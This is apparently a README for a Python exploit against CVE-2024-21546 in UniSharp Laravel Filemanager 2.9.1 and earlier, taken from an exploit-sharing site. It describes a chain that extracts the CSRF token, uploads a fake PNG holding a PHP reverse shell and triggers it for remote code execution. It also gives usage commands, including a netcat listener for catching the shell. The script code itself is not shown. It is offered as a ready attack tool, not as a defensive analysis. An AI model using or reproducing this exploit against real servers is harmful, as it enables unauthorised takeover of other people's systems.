## https://sploitus.com/exploit?id=E2B4AE6B-6ADC-54F5-B676-4394C6ED9705
# CVE-2024-21546 Python Exploit
## ๐ฅ Description
This Python exploit script targets a vulnerable Laravel Filemanager created by **UniSharp**, which allows authenticated users to bypass file restrictions and upload malicious files. This can lead to **Remote Code Execution (RCE)** when the uploaded payload is triggered.
The exploit performs the following:
- Validates the user-provided `laravel_session`
- Extracts CSRF `_token` via regex
- Uploads a fake PNG file containing a PHP reverse shell payload
- Triggers the uploaded file
## โ ๏ธ Affected Versions
Version 2.9.1 and prior version
## โ๏ธ Usage
```shell
python3 CVE-2024-21546.py <target_url> <listener_ip> <listener_port> <laravel_session>
```
Important: Start your listener before running the script:
```shell
nc -lvnp <listener_port>
```
## ๐ป Sample Run

## โน๏ธ Reference
- [CVE-2024-21546](https://www.cvedetails.com/cve/CVE-2024-21546/)
- [RCE through Upload Shell on Unisharp Laravel Filemanager](https://gist.github.com/ImHades101/338a06816ef97262ba632af9c78b78ca)
- [Commit 8170760](https://github.com/UniSharp/laravel-filemanager/commit/8170760c0ae316d77b9363cd4c76ab68d3f63f0b)